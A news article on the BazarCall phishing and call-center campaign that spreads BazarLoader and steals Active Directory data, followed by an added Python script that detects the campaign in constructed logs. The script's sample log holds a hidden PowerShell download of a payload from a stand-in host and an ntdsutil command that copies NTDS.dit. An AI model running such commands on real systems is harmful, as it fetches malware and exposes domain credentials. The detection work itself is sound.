Microsoft's cybersecurity researchers are now on the hunt for BazarCall, a criminal group that uses call centers to infect PCs with BazarLoader, a malware loader that has been used to distribute ransomware.
BazarCall (or Bazacall) actors have been active since January and are notable because they use live call center operators to talk victims through installing BazarLoader onto a Windows PC.
Palo Alto Networks' Brad Duncan recently detailed the group's techniques in a blog post. As he describes, the malware provides backdoor access to an infected Windows device: "After a client is infected, criminals use this backdoor access to send follow-up malware, scan the environment and exploit other vulnerable hosts on the network," Duncan noted.
Usually, the attack starts with phishing emails advising the victim that a trial subscription has expired and that they will be automatically charged a monthly fee unless they call a number to cancel the trial.
The group's activity has now caught the attention of Microsoft's Security Intelligence team.
Microsoft's focus is on the group's phishing emails that target Office 365 users. The example it shows is an email purporting to be from a tech firm claiming that the victim has downloaded a demo version that will expire in 24 hours, at which point they will be charged for the software.
"When recipients call the number, a fraudulent call center operated by the attackers instructs them to visit a website and download an Excel file in order to cancel the service. The Excel file contains a malicious macro that downloads the payload," Microsoft Security Intelligence explains.
Microsoft's security team has also observed the group using the Cobalt Strike penetration testing kit to steal credentials, including the Active Directory (AD) database. Cobalt Strike is frequently used for lateral movement on a network after an initial compromise. Theft of the AD database is serious for any enterprise: it holds the identity and credential data, including the password hashes, for every account in the domain, so an attacker who copies it can crack those hashes offline or reuse them to impersonate any user.
Microsoft has published a GitHub page for publicly sharing details about the BazarCall campaign as it tracks it. It is updating details about the phishing emails, the use of Cobalt Strike for lateral movement, the malicious Excel macros and how the Excel files are delivered, and the theft of the AD database file, NTDS.dit (Windows NT Directory Services).
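Two stages of the chain above leave distinctive traces in process-creation telemetry: an Office application spawning a scripting or download utility when the macro "downloads the payload", and a later attempt to copy NTDS.dit off a domain controller. The following is an added example, not code from the article or from Microsoft's GitHub page, of detection logic for both stages run over a few constructed, Sysmon-style log lines. The log format, the list of suspicious child processes and the assumption that NTDS.dit is copied with an ntdsutil IFM snapshot are all choices of this example; the article only says NTDS was used to steal AD files.

```python
"""Added example: flag Office-spawned download helpers and NTDS.dit theft
in constructed process-creation log lines (not the article's own code).

Assumed log format (Sysmon-like, one event per line):
    parent="<parent image>" image="<image>" cmd="<command line>"
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Office parents that should not normally launch the children below.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Assumed list of helpers a macro typically uses to fetch/run a payload.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
}

LINE_RE = re.compile(
    r'parent="(?P<parent>[^"]*)"\s+image="(?P<image>[^"]*)"\s+cmd="(?P<cmd>[^"]*)"'
)


@dataclass
class Finding:
    rule: str
    line: str


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_line(line: str) -> Optional[dict]:
    """Return the three fields as a dict, or None if the line is not an event."""
    m = LINE_RE.search(line)
    return m.groupdict() if m else None


def office_spawns_child(ev: dict) -> bool:
    """Stage 1: macro in Excel/Word/PowerPoint launches a LOLBin or shell."""
    return (_basename(ev["parent"]) in OFFICE_PARENTS
            and _basename(ev["image"]) in SUSPICIOUS_CHILDREN)


def ntds_dump(ev: dict) -> bool:
    """Stage 2: AD database theft.

    Assumed technique: ntdsutil's 'ifm create' snapshot, which writes a copy of
    NTDS.dit to disk. Any other process naming ntds.dit on its command line
    (e.g. copying it out of a shadow copy) is also flagged.
    """
    image = _basename(ev["image"])
    cmd = ev["cmd"].lower()
    if image == "ntdsutil.exe" and "ifm" in cmd and "create" in cmd:
        return True
    return "ntds.dit" in cmd and image != "lsass.exe"


def scan(lines: List[str]) -> List[Finding]:
    """Run both rules over every parsable line, in input order."""
    findings: List[Finding] = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue  # not an event line; ignore
        if office_spawns_child(ev):
            findings.append(Finding("office_spawns_child", line))
        if ntds_dump(ev):
            findings.append(Finding("ntds_dump", line))
    return findings


# Constructed sample log: two benign events and two that match the rules.
# Inner quotes are omitted from the ntdsutil command line to keep the
# assumed log format simple; the real invocation quotes each sub-command.
SAMPLE_LOG = [
    r'parent="C:\Windows\explorer.exe" image="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" cmd="EXCEL.EXE C:\Users\alice\Downloads\cancel_subscription.xls"',
    r'parent="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" image="C:\Windows\System32\cmd.exe" cmd="cmd.exe /c powershell -w hidden Invoke-WebRequest http://example.invalid/payload.dll -OutFile C:\Users\Public\payload.dll"',
    r'parent="C:\Windows\System32\services.exe" image="C:\Windows\System32\svchost.exe" cmd="svchost.exe -k netsvcs"',
    r'parent="C:\Windows\System32\cmd.exe" image="C:\Windows\System32\ntdsutil.exe" cmd="ntdsutil.exe ac i ntds ifm create full C:\temp\ifm q q"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.rule}] {f.line}")
```

Running the script prints one `office_spawns_child` hit for the Excel-to-cmd.exe event and one `ntds_dump` hit for the ntdsutil event; the user opening the spreadsheet and the ordinary svchost launch produce nothing. In a real deployment the parent/child rule needs an allow-list for legitimate add-ins, and the NTDS rule should be paired with alerting on Volume Shadow Copy creation on domain controllers, which the example leaves out.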